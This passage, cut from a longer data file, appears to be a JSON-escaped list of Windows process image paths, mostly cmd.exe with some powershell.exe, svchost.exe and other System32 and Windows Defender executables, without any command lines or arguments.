m32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.